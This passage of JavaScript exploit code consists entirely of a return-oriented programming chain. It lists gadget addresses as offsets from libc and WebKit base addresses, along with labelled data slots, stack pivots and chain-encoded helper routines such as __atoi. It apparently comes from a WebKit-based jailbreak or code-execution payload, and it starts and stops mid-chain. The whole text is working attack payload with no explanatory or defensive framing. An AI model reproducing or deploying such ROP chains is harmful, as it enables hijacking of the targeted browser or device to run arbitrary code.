libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+182368, //L2879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182384, //L2880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182352, //L2878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2878: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2879: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2880: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182544, //L2885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182560, //L2886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182496, //L2882 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2882: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2883: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2884: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2886: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+182672, //L2887+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+182664, //L2887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2887: db([0, 0]); // 0x0 set_gadgets([ ropchain+182688, //L2887+24 ropchain+184448, //L2881 libc_base+764760, //pop rsi ropchain+182728, //L2888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2888: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2890: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+182848, //L2893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182832, //L2891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2891: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2893: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+183008, //L2897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+182976, //L2895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+182992, //L2896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2894: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2895: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2896: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2897: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183064, //L2899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2899: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183192, //L2901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183208, //L2902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183176, //L2900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2900: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2901: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2902: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183368, //L2906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+183336, //L2904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183352, //L2905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2903: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2904: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2905: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2906: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+183424, //L2908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2908: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+183552, //L2910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183568, //L2911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183536, //L2909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2909: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2910: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2911: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183648, //L2912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+183664, //L2913 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2912: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2913: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183760, //L2915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+183744, //L2914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2914: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2915: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+183840, //L2916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2917: db([57, 0]); // 0x39 set_gadget(libc_base+144605,); //pop rdi //L2918: db([57, 0]); // 0x39 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+183984, //L2919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184016, //L2921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184000, //L2920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2919: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2920: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2921: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184192, //L2923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184208, //L2924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+184176, //L2922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2923: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+184352, //L2927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184368, //L2928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+184320, //L2925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2925: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2926: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2927: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2928: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184440, //L2929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2929: db([0, 0]); // 0x0 //L2881: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+184504, //L2932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2931: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2932: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184584, //L2934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2933: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2934: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+184712, //L2935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184744, //L2937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+184728, //L2936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2937: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184848, //L2938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184864, //L2939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2938: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2939: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+184984, //L2940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+184968, //L2941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2941: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2940: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+185072, //L2943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+185056, //L2942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2942: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2943: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185176, //L2944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185192, //L2945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2944: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2945: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185312, //L2946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185296, //L2947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2947: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2946: db([0, 0]); // 0x0 //__atoi: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+185384, //L2949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2949: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185448, //L2951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2951: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2952: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2954: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185576, //L2956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+185632, //L2958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2958: db([0, 0]); // 0x0 //L2957: set_gadgets([ libc_base+764760, //pop rsi ropchain+185680, //L2960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2960: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2962: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+185800, //L2965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+185784, //L2963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2963: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2965: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185880, //L2966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185896, //L2967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2966: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2967: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+185976, //L2968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+185992, //L2969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2969: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+186152, //L2973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+186120, //L2971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186136, //L2972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2970: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2971: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2972: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2973: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186208, //L2975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2975: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186336, //L2977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186352, //L2978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186320, //L2976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2976: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2977: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2978: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186512, //L2982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186480, //L2980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186496, //L2981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2979: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2982: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186568, //L2984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2984: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+186696, //L2986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+186712, //L2987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186680, //L2985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2985: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2986: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2987: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+186872, //L2991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+186840, //L2989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+186856, //L2990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2988: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2989: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2990: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2991: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+186928, //L2993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2993: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187056, //L2995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187072, //L2996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187040, //L2994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2994: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2995: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2996: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187152, //L2997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187168, //L2998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2997: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2998: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187264, //L3000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187248, //L2999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L3002: ropchain+187368, //L3001 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+180736, //__is_digit //L3001: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+187496, //L3005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+187480, //L3004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3003: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L3004: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3005: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+187552, //L3007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L3007: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+187680, //L3009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187696, //L3010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187664, //L3008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3008: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3010: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+187808, //L3012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+187856, //L3015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+187824, //L3013 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3012: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3013: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3015: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+187968, //L3016+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+187960, //L3016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3016: db([0, 0]); // 0x0 set_gadgets([ ropchain+187984, //L3016+24 ropchain+191512, //L3011 libc_base+764760, //pop rsi ropchain+188024, //L3017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3017: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3019: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+188144, //L3022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188128, //L3020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3022: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+188320, //L3025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+188336, //L3026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+188288, //L3023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+188304, //L3024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3023: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3024: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3025: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3026: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+188432, //L3028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 